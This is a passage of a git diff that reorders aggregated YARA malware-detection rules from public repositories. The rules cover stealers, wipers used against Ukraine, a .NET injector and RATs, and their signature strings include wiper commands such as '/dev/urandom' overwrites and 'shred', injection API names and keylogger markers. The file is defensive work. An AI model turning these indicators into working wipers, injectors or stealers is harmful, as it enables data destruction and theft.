-		$s3 = {44 65 66 6C 61 74 65 53 74 72 65 61 6D}
-		$cnct = {72 ?? ?? 00 70 28 FB 00 00 0A 72 ?? ?? 00 70 28 ?? 00 00 0A}
-		$nr1 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
-		$nr2 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
-		$nr3 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
-		$nr4 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
+		$s1 = {59 61 6E 6F 41 74 74 72 69 62 75 74 65}
+		$s2 = "CreateShortcut" wide
+		$s3 = ".vbs" wide
 
 	condition:
-		filesize < 5MB and all of ( $s* ) and dotnet.number_of_resources > 4 and dotnet.number_of_resources < 6 and 2 of ( $nr* ) and dotnet.assembly_refs [ 1 ] . name contains "protobuf-net" and #cnct > 5
+		3 of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
-
-rule RUSSIANPANDA_Purecrypter : FILE
+rule RUSSIANPANDA_Meduzastealer : FILE
 {
 	meta:
-		description = "Detects PureCrypter"
+		description = "Detects MeduzaStealer 1-2024"
 		author = "RussianPanda"
-		id = "5670772c-ada1-55fa-b7fd-9dadd1756259"
-		date = "2024-01-09"
-		modified = "2024-01-09"
-		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PureCrypter/purecrypter.yar#L3-L22"
+		id = "6bc4c048-a32d-5a9c-b213-980c64d08d29"
+		date = "2024-01-01"
+		modified = "2024-01-01"
+		reference = "https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MeduzaStealer/MeduzaStealer_1-1-2024.yar#L1-L16"
 		license_url = "N/A"
-		hash = "566d8749e166436792dfcbb5e5514f18c9afc0e1314833ac2e3d86f37ff2030f"
-		logic_hash = "dd8592fa0b7d240d23235008601500a20e068032f6dcd6e90a38b06ac747b8af"
+		logic_hash = "0547e51abd04302c45f1319bc21046ade019bc98eb85d9cba67cb2109ff642eb"
 		score = 75
 		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {28 ?? 00 00 ?? 28 02 00 00 2B 28 ?? 00 00 (0A|06)}
-		$s2 = {73 ?? 00 00 0A}
-		$s3 = {73 ?? 00 00 06 6F ?? 00 00 06}
-		$s4 = {52 65 73 6F 75 72 63 65 4D 61 6E 61 67 65 72}
-		$s5 = {28 ?? 00 00 ?? 6F ?? 00 00 0A 28 03 00 00 2B ?? 6F ?? 00 00 0A 28 ?? 00 00 2B}
+		$s1 = {41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 57 69 6e 55 70 64 61 74 65 2e 65 78 65}
+		$s2 = {0f 57 ?? ?? ?? 00 00 66 0f 7f 85 ?? ?? 00 00}
+		$s3 = {48 8d 15 ?? ?? 05 00 49 8b cf}
+		$s4 = {48 8d 0d ?? ?? 06 00 ff 15 ?? ?? 06 00}
 
 	condition:
-		filesize < 6MB and 4 of ( $s* ) and dotnet.number_of_resources > 0 and dotnet.number_of_resources < 2 and dotnet.resources [ 0 ] . length > 300KB
+		3 of ( $s* ) and filesize < 1MB
 }
 /*
  * YARA Rule Set
  * Repository Name: CadoSecurity
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 8
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -169654,32 +169601,32 @@ rule RUSSIANPANDA_Purecrypter : FILE
  *
  * NO LICENSE SET
  */
-rule CADOSECURITY_Wiper_Ukr_Feb_2022 : FILE
+rule CADOSECURITY_Lambda_Malware : FILE
 {
 	meta:
-		description = "Detects Wiper seen in Ukraine 23rd Feb 2022"
-		author = "cadosecurity.com"
-		id = "98f80c1b-7575-51d4-8265-680ea204990a"
-		date = "2022-02-23"
-		modified = "2023-04-10"
-		reference = "https://github.com/cado-security/wiper_feb_2022"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Wiper_Ukr_Feb_2022.yar#L1-L18"
+		description = "Detects AWS Lambda Malware"
+		author = "cdoman@cadosecurity.com"
+		id = "cd867d39-7ff8-599a-bd65-e0f5581ac3f6"
+		date = "2022-04-03"
+		modified = "2022-07-06"
+		reference = "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Lambda_Malware.yar#L1-L17"
 		license_url = "N/A"
-		hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
-		logic_hash = "fa96b88c42bdd4ba437f090d781b38c5c7f9fcb690aeff4161f24aedb1870587"
+		logic_hash = "46567ceeb39a3b3379fc5ee876e1539b24e8192af8fe31b5df16fb2b3105f176"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		license = "Apache License 2.0"
+		hash1 = "739fe13697bc55870ceb35003c4ee01a335f9c1f6549acb6472c5c3078417eed"
+		hash2 = "a31ae5b7968056d8d99b1b720a66a9a1aeee3637b97050d95d96ef3a265cbbca"
 
 	strings:
-		$ = "Hermetica Digital Ltd" wide ascii
-		$ = "DRV_XP_X64" wide ascii
-		$ = "Windows\\System32\\winevt\\Logs" wide ascii
-		$ = "EPMNTDRV\\%u" wide ascii
+		$a = "github.com/likexian/doh-go/provider/"
+		$b = "Mozilla/5.0 (compatible; Ezooms/1.0; help@moz.com)"
+		$c = "username:password pair for mining server"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 30000KB and all of them
 }
 rule CADOSECURITY_Whispergate_Stage_1 : FILE
 {
@@ -169738,70 +169685,63 @@ rule CADOSECURITY_Linux_Worm_ORCSHRED
 	condition:
 		4 of them
 }
-rule CADOSECURITY_Linux_Wiper_AWFULSHRED
+rule CADOSECURITY_Whispergate_Stage_2 : FILE
 {
 	meta:
-		description = "Detects AWFULSHRED wiper used against Ukrainian ICS"
+		description = "Detects second stage payload from WhisperGate"
 		author = "mmuir@cadosecurity.com"
-		id = "0328f0d9-3c73-5d13-bf32-8a25139cf3cf"
-		date = "2022-04-12"
-		modified = "2022-07-06"
-		reference = "https://github.com/cado-security/DFIR_Resources_Industroyer2"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Linux_Wiper_AWFULSHRED.yar#L1-L26"
+		id = "ef3b4b56-e4f4-599f-a46b-ed450f97a66e"
+		date = "2022-01-17"
+		modified = "2023-04-10"
+		reference = "https://github.com/cado-security/DFIR_Resources_Whispergate"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Whispergate_Stage_2.yar#L1-L20"
 		license_url = "N/A"
-		hash = "bcdf0bd8142a4828c61e775686c9892d89893ed0f5093bdc70bde3e48d04ab99"
-		logic_hash = "796dfdc4238e3d729180657b7bc79464003434c73568b49895cb8d37ce1a5499"
+		hash = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
+		logic_hash = "2ecf679e2d69a6433caaad867cc403f8759e1692fbe08006a73c73a062c68fe1"
 		score = 75
-		quality = 80
-		tags = ""
+		quality = 64
+		tags = "FILE"
 		license = "Apache License 2.0"
 
 	strings:
-		$isBash = "/bin/bash" ascii
-		$a1 = "declare -r" ascii
-		$a2 = "bash_history" ascii
-		$a3 = "bs=1k if=/dev/urandom of=" ascii
-		$a4 = "systemd" ascii
-		$a5 = "apache http ssh" ascii
-		$a6 = "shred" ascii
-		$var1 = "iwljzfkg" ascii
-		$var2 = "yrkdrrue" ascii
-		$var3 = "agzerlyf" ascii
-		$var4 = "rggygzny" ascii
-		$var5 = "zubzgnvp" ascii
+		$a = { 6D 5F 49 6E 74 65 72 63 65 70 74 6F 72 }
+		$b = { 6D 5F 62 31 36 65 37 33 65 30 64 61 61 63 34 62 34 33 62 36 35 36 36 39 30 31 62 35 34 32 34 63 35 33 }
+		$c = { 6D 5F 34 33 37 37 33 32 63 65 65 35 66 35 34 64 37 64 38 34 61 64 64 37 62 64 33 30 39 37 64 33 63 61 }
+		$d = { 6D 5F 30 64 62 39 37 30 38 63 66 36 34 39 34 30 38 32 39 66 39 61 66 38 37 65 64 65 65 64 66 36 30 65 }
+		$e = { 6D 5F 65 31 34 33 33 31 36 38 32 30 62 31 34 64 30 33 38 38 61 37 32 37 34 34 33 38 65 63 30 37 38 64 }
+		$f = { 6D 5F 66 33 31 30 39 30 63 37 31 35 64 65 34 62 30 62 61 62 64 33 31 61 36 33 34 31 31 30 34 36 63 38 }
+		$g = { 6D 5F 36 31 31 64 31 61 62 63 33 32 66 63 34 66 64 38 61 33 34 65 30 34 34 66 39 37 33 34 34 31 64 61 }
+		$h = { 6D 5F 37 37 34 62 39 32 31 30 64 39 38 31 34 32 65 62 62 34 34 31 33 35 35 39 64 61 61 65 35 61 34 34 }
 
 	condition:
-		$isBash and 3 of ( $a* ) and 4 of ( $var* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CADOSECURITY_Powershell_Downloader_POWERGAP
+rule CADOSECURITY_Wiper_Ukr_Feb_2022 : FILE
 {
 	meta:
-		description = "Detects POWERGAP downloader used against Ukrainian ICS"
-		author = "mmuir@cadosecurity.com"
-		id = "d2a2604c-c558-5663-8dd3-44f3fdda1f71"
-		date = "2022-04-12"
-		modified = "2022-07-06"
-		reference = "https://github.com/cado-security/DFIR_Resources_Industroyer2"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Powershell_Downloader_POWERGAP.yar#L1-L19"
+		description = "Detects Wiper seen in Ukraine 23rd Feb 2022"
+		author = "cadosecurity.com"
+		id = "98f80c1b-7575-51d4-8265-680ea204990a"
+		date = "2022-02-23"
+		modified = "2023-04-10"
+		reference = "https://github.com/cado-security/wiper_feb_2022"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Wiper_Ukr_Feb_2022.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "a9ef1d04ca921f285e973f6abcb2b355eae110678da866e3b6499aa0318338fd"
+		hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
+		logic_hash = "fa96b88c42bdd4ba437f090d781b38c5c7f9fcb690aeff4161f24aedb1870587"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "Apache License 2.0"
 
 	strings:
-		$a = "Start-work" ascii
-		$b = "$GpoGuid" ascii
-		$c = "$SourceFile" ascii
-		$d = "$DestinationFile" ascii
-		$e = "$appName" ascii
-		$f = "LDAP://ROOTDSE" ascii
-		$g = "GPT.INI" ascii
-		$h = "Get-WmiObject" ascii
+		$ = "Hermetica Digital Ltd" wide ascii
+		$ = "DRV_XP_X64" wide ascii
+		$ = "Windows\\System32\\winevt\\Logs" wide ascii
+		$ = "EPMNTDRV\\%u" wide ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
 rule CADOSECURITY_Linux_Wiper_SOLOSHRED
 {
@@ -169831,69 +169771,76 @@ rule CADOSECURITY_Linux_Wiper_SOLOSHRED
 	condition:
 		all of them
 }
-rule CADOSECURITY_Whispergate_Stage_2 : FILE
+rule CADOSECURITY_Powershell_Downloader_POWERGAP
 {
 	meta:
-		description = "Detects second stage payload from WhisperGate"
+		description = "Detects POWERGAP downloader used against Ukrainian ICS"
 		author = "mmuir@cadosecurity.com"
-		id = "ef3b4b56-e4f4-599f-a46b-ed450f97a66e"
-		date = "2022-01-17"
-		modified = "2023-04-10"
-		reference = "https://github.com/cado-security/DFIR_Resources_Whispergate"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Whispergate_Stage_2.yar#L1-L20"
+		id = "d2a2604c-c558-5663-8dd3-44f3fdda1f71"
+		date = "2022-04-12"
+		modified = "2022-07-06"
+		reference = "https://github.com/cado-security/DFIR_Resources_Industroyer2"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Powershell_Downloader_POWERGAP.yar#L1-L19"
 		license_url = "N/A"
-		hash = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
-		logic_hash = "2ecf679e2d69a6433caaad867cc403f8759e1692fbe08006a73c73a062c68fe1"
+		logic_hash = "a9ef1d04ca921f285e973f6abcb2b355eae110678da866e3b6499aa0318338fd"
 		score = 75
-		quality = 64
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		license = "Apache License 2.0"
 
 	strings:
-		$a = { 6D 5F 49 6E 74 65 72 63 65 70 74 6F 72 }
-		$b = { 6D 5F 62 31 36 65 37 33 65 30 64 61 61 63 34 62 34 33 62 36 35 36 36 39 30 31 62 35 34 32 34 63 35 33 }
-		$c = { 6D 5F 34 33 37 37 33 32 63 65 65 35 66 35 34 64 37 64 38 34 61 64 64 37 62 64 33 30 39 37 64 33 63 61 }
-		$d = { 6D 5F 30 64 62 39 37 30 38 63 66 36 34 39 34 30 38 32 39 66 39 61 66 38 37 65 64 65 65 64 66 36 30 65 }
-		$e = { 6D 5F 65 31 34 33 33 31 36 38 32 30 62 31 34 64 30 33 38 38 61 37 32 37 34 34 33 38 65 63 30 37 38 64 }
-		$f = { 6D 5F 66 33 31 30 39 30 63 37 31 35 64 65 34 62 30 62 61 62 64 33 31 61 36 33 34 31 31 30 34 36 63 38 }
-		$g = { 6D 5F 36 31 31 64 31 61 62 63 33 32 66 63 34 66 64 38 61 33 34 65 30 34 34 66 39 37 33 34 34 31 64 61 }
-		$h = { 6D 5F 37 37 34 62 39 32 31 30 64 39 38 31 34 32 65 62 62 34 34 31 33 35 35 39 64 61 61 65 35 61 34 34 }
+		$a = "Start-work" ascii
+		$b = "$GpoGuid" ascii
+		$c = "$SourceFile" ascii
+		$d = "$DestinationFile" ascii
+		$e = "$appName" ascii
+		$f = "LDAP://ROOTDSE" ascii
+		$g = "GPT.INI" ascii
+		$h = "Get-WmiObject" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		5 of them
 }
-rule CADOSECURITY_Lambda_Malware : FILE
+rule CADOSECURITY_Linux_Wiper_AWFULSHRED
 {
 	meta:
-		description = "Detects AWS Lambda Malware"
-		author = "cdoman@cadosecurity.com"
-		id = "cd867d39-7ff8-599a-bd65-e0f5581ac3f6"
-		date = "2022-04-03"
+		description = "Detects AWFULSHRED wiper used against Ukrainian ICS"
+		author = "mmuir@cadosecurity.com"
+		id = "0328f0d9-3c73-5d13-bf32-8a25139cf3cf"
+		date = "2022-04-12"
 		modified = "2022-07-06"
-		reference = "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Lambda_Malware.yar#L1-L17"
+		reference = "https://github.com/cado-security/DFIR_Resources_Industroyer2"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Cado Security/Linux_Wiper_AWFULSHRED.yar#L1-L26"
 		license_url = "N/A"
-		logic_hash = "46567ceeb39a3b3379fc5ee876e1539b24e8192af8fe31b5df16fb2b3105f176"
+		hash = "bcdf0bd8142a4828c61e775686c9892d89893ed0f5093bdc70bde3e48d04ab99"
+		logic_hash = "796dfdc4238e3d729180657b7bc79464003434c73568b49895cb8d37ce1a5499"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "Apache License 2.0"
-		hash1 = "739fe13697bc55870ceb35003c4ee01a335f9c1f6549acb6472c5c3078417eed"
-		hash2 = "a31ae5b7968056d8d99b1b720a66a9a1aeee3637b97050d95d96ef3a265cbbca"
 
 	strings:
-		$a = "github.com/likexian/doh-go/provider/"
-		$b = "Mozilla/5.0 (compatible; Ezooms/1.0; help@moz.com)"
-		$c = "username:password pair for mining server"
+		$isBash = "/bin/bash" ascii
+		$a1 = "declare -r" ascii
+		$a2 = "bash_history" ascii
+		$a3 = "bs=1k if=/dev/urandom of=" ascii
+		$a4 = "systemd" ascii
+		$a5 = "apache http ssh" ascii
+		$a6 = "shred" ascii
+		$var1 = "iwljzfkg" ascii
+		$var2 = "yrkdrrue" ascii
+		$var3 = "agzerlyf" ascii
+		$var4 = "rggygzny" ascii
+		$var5 = "zubzgnvp" ascii
 
 	condition:
-		filesize < 30000KB and all of them
+		$isBash and 3 of ( $a* ) and 4 of ( $var* )
 }
 /*
  * YARA Rule Set
  * Repository Name: Check Point
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 4
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -169983,7 +169930,60 @@ rule CHECK_POINT_Apt_Nazar_Component_Guids
 		$guid5_filesystem = { AB D3 13 CF 1C 6A E8 4A A3 74 DE D5 15 5D 6A 88 }
 
 	condition:
-		any of them
+		any of them
+}
+rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE
+{
+	meta:
+		description = "Detects new and old version of dotRunpeX - configurable .NET injector"
+		author = "Jiri Vinopal (jiriv)"
+		id = "43e2d520-bfe4-5530-a5b4-508cfba9d06e"
+		date = "2022-10-30"
+		modified = "2023-04-10"
+		reference = "https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/injector_ZZ_dotRunpeX_oldnew.yar#L1-L45"
+		license_url = "N/A"
+		logic_hash = "c6ae0b4fb6cae16ae8d71e238f7753e0eadd23820507616fa2331375f4403052"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		hash1_New = "373a86e36f7e808a1db263b4b49d2428df4a13686da7d77edba7a6dd63790232"
+		hash2_New = "41ea8f9a9f2a7aeb086dedf8e5855b0409f31e7793cbba615ca0498e47a72636"
+		hash3_New = "5e3588e8ddebd61c2bd6dab4b87f601bd6a4857b33eb281cb5059c29cfe62b80"
+		hash4_New = "8c451b84d9579b625a7821ad7ddcb87bdd665a9e6619eaecf6ab93cd190cf504"
+		hash5_New = "8fa81f6341b342afa40b7dc76dd6e0a1874583d12ea04acf839251cb5ca61591"
+		hash6_New = "cd4c821e329ec1f7bfe7ecd39a6020867348b722e8c84a05c7eb32f8d5a2f4db"
+		hash7_New = "fa8a67642514b69731c2ce6d9e980e2a9c9e409b3947f2c9909d81f6eac81452"
+		hash8_New = "eb2e2ac0f5f51d90fe90b63c3c385af155b2fee30bc3dc6309776b90c21320f5"
+		hash1_Old = "1e7614f757d40a2f5e2f4bd5597d04878768a9c01aa5f9f23d6c87660f7f0fbc"
+		hash2_Old = "317e6817bba0f54e1547dd9acf24ee17a4cda1b97328cc69dc1ec16e11c258fc"
+		hash3_Old = "65cac67ed2a084beff373d6aba6f914b8cba0caceda254a857def1df12f5154b"
+		hash4_Old = "68ae2ee5ed7e793c1a49cbf1b0dd7f5a3de9cb783b51b0953880994a79037326"
+		hash5_Old = "81763d8e3b42d07d76b0a74eda4e759981971635d62072c8da91251fc849b91e"
+
+	strings:
+		$implmap1 = "VirtualAllocEx"
+		$implmap2 = "CreateProcess"
+		$implmap3 = "CreateRemoteThread"
+		$implmap4 = "Wow64SetThreadContext"
+		$implmap5 = "Wow64GetThreadContext"
+		$implmap6 = "RtlInitUnicodeString"
+		$implmap7 = "NtLoadDriver"
+		$implmap8 = "LoadLibrary"
+		$implmap9 = "VirtualProtect"
+		$implmap10 = "AdjustTokenPrivileges"
+		$implmap11 = "GetProcAddress"
+		$modulerefKernel1 = "Kernel32"
+		$modulerefKernel2 = "kernel32"
+		$modulerefNtdll1 = "Ntdll"
+		$modulerefNtdll2 = "ntdll"
+		$regPath = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" wide
+		$rsrcName = "BIDEN_HARRIS_PERFECT_ASSHOLE" wide
+		$koiVM1 = "KoiVM"
+		$koiVM2 = "#Koi"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and ( $regPath or $rsrcName or 1 of ( $koiVM* ) ) and 9 of ( $implmap* ) and 1 of ( $modulerefKernel* ) and 1 of ( $modulerefNtdll* )
 }
 rule CHECK_POINT_Injector_ZZ_Dotrunpex : FILE
 {
@@ -170050,64 +170050,11 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and ( $regPath or $rsrcName or 1 of ( $koiVM* ) ) and 24 of ( $implmap* ) and 1 of ( $modulerefKernel* ) and 1 of ( $modulerefNtdll* ) and 1 of ( $modulerefAdvapi* )
 }
-rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE
-{
-	meta:
-		description = "Detects new and old version of dotRunpeX - configurable .NET injector"
-		author = "Jiri Vinopal (jiriv)"
-		id = "43e2d520-bfe4-5530-a5b4-508cfba9d06e"
-		date = "2022-10-30"
-		modified = "2023-04-10"
-		reference = "https://research.checkpoint.com/2023/dotrunpex-demystifying-new-virtualized-net-injector-used-in-the-wild/"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Checkpoint/injector_ZZ_dotRunpeX_oldnew.yar#L1-L45"
-		license_url = "N/A"
-		logic_hash = "c6ae0b4fb6cae16ae8d71e238f7753e0eadd23820507616fa2331375f4403052"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1_New = "373a86e36f7e808a1db263b4b49d2428df4a13686da7d77edba7a6dd63790232"
-		hash2_New = "41ea8f9a9f2a7aeb086dedf8e5855b0409f31e7793cbba615ca0498e47a72636"
-		hash3_New = "5e3588e8ddebd61c2bd6dab4b87f601bd6a4857b33eb281cb5059c29cfe62b80"
-		hash4_New = "8c451b84d9579b625a7821ad7ddcb87bdd665a9e6619eaecf6ab93cd190cf504"
-		hash5_New = "8fa81f6341b342afa40b7dc76dd6e0a1874583d12ea04acf839251cb5ca61591"
-		hash6_New = "cd4c821e329ec1f7bfe7ecd39a6020867348b722e8c84a05c7eb32f8d5a2f4db"
-		hash7_New = "fa8a67642514b69731c2ce6d9e980e2a9c9e409b3947f2c9909d81f6eac81452"
-		hash8_New = "eb2e2ac0f5f51d90fe90b63c3c385af155b2fee30bc3dc6309776b90c21320f5"
-		hash1_Old = "1e7614f757d40a2f5e2f4bd5597d04878768a9c01aa5f9f23d6c87660f7f0fbc"
-		hash2_Old = "317e6817bba0f54e1547dd9acf24ee17a4cda1b97328cc69dc1ec16e11c258fc"
-		hash3_Old = "65cac67ed2a084beff373d6aba6f914b8cba0caceda254a857def1df12f5154b"
-		hash4_Old = "68ae2ee5ed7e793c1a49cbf1b0dd7f5a3de9cb783b51b0953880994a79037326"
-		hash5_Old = "81763d8e3b42d07d76b0a74eda4e759981971635d62072c8da91251fc849b91e"
-
-	strings:
-		$implmap1 = "VirtualAllocEx"
-		$implmap2 = "CreateProcess"
-		$implmap3 = "CreateRemoteThread"
-		$implmap4 = "Wow64SetThreadContext"
-		$implmap5 = "Wow64GetThreadContext"
-		$implmap6 = "RtlInitUnicodeString"
-		$implmap7 = "NtLoadDriver"
-		$implmap8 = "LoadLibrary"
-		$implmap9 = "VirtualProtect"
-		$implmap10 = "AdjustTokenPrivileges"
-		$implmap11 = "GetProcAddress"
-		$modulerefKernel1 = "Kernel32"
-		$modulerefKernel2 = "kernel32"
-		$modulerefNtdll1 = "Ntdll"
-		$modulerefNtdll2 = "ntdll"
-		$regPath = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" wide
-		$rsrcName = "BIDEN_HARRIS_PERFECT_ASSHOLE" wide
-		$koiVM1 = "KoiVM"
-		$koiVM2 = "#Koi"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and ( $regPath or $rsrcName or 1 of ( $koiVM* ) ) and 9 of ( $implmap* ) and 1 of ( $modulerefKernel* ) and 1 of ( $modulerefNtdll* )
-}
 /*
  * YARA Rule Set
  * Repository Name: BlackBerry
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 22
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -170117,30 +170064,97 @@ rule CHECK_POINT_Injector_ZZ_Dotrunpex_Oldnew : FILE
  *
  * NO LICENSE SET
  */
-rule BLACKBERRY_Mal_Backdoor_Chachi_RAT : FILE
+rule BLACKBERRY_Boratrat : FILE
 {
 	meta:
-		description = "ChaChi RAT used in PYSA Ransomware Campaigns"
-		author = "BlackBerry Threat Research & Intelligence"
-		id = "f0d531d3-585a-5194-ac30-fc62433d0ffc"
-		date = "2022-07-07"
+		description = "Detects BoratRAT.exe"
+		author = "BlackBerry Threat Research Team"
+		id = "d3c73c3b-885a-5fc2-a1bd-a05cadf1512f"
+		date = "2022-04-13"
 		modified = "2022-07-07"
-		reference = "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Backdoor_ChaChi_RAT.yar#L1-L25"
+		reference = "https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/BoratRAT.yar#L1-L41"
 		license_url = "N/A"
-		logic_hash = "b49f22ceb57a21716c05dcf264cc239596f3a076525d7416961ae1f38bcf25bd"
+		logic_hash = "3141300495288a96b48cfea491683042d172143295135ff82c058200c8d5108d"
 		score = 75
-		quality = 77
+		quality = 85
 		tags = "FILE"
+		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
 
 	strings:
-		$go = { 47 6F 20 62 75 69 6C 64 20 49 44 3A }
-		$dnsStream = { 64 6E 73 53 74 72 65 61 6D }
-		$socks5 = { 53 4F 43 4B 53 35 }
-		$chisel = { 63 68 69 73 65 6C }
+		$s1 = "enigma1"
+		$s2 = "enigma2"
+		$s3 = "Server.Forms.FormFileManager.resources"
+		$s4 = "Server.Forms.FormFileSearcher.resources"
+		$s5 = "Server.Forms.FormKeylogger.resources"
+		$s6 = "Server.Forms.FormNetstat.resources"
+		$s7 = "Server.Forms.FormFun.resources"
+		$s8 = "Server.Forms.FormWebcam.resources"
+		$s9 = "BoratRat"
+		$s10 = "Keylogger.exe"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
+		uint16( 0 ) == 0x5a4d and all of them
+}
+
+rule BLACKBERRY_Mal_Infostealer_Win32_Jupyter_Download_And_Execute_Module
+{
+	meta:
+		description = "Detects Jupter download and execute module. Research has shown it downloading SolarDelphi / JupyterStealer."
+		author = "BlackBerry Threat Research Team"
+		id = "318b0327-b4b0-57a6-8a24-51320b1026ec"
+		date = "2021-11-09"
+		modified = "2022-07-06"
+		reference = "https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Blackberry/Mal_Infostealer_Win32_Jupyter_Download_and_Execute_Module.yar#L4-L30"
+		license_url = "N/A"
+		logic_hash = "7491eeb06e88512711688a1baf6967e6b6bf80ad4937c16fd49059903cac35df"
+		score = 75
+		quality = 85
+		tags = ""
+		license = "This Yara rule is provided under the Apache License 2.0 (https://www.apache.org/licenses/LICENSE-2.0) and open to any user or organization, as long as you use it under this license and ensure originator credit in any derivative to The BlackBerry Research & Intelligence Team"
+
+	strings:
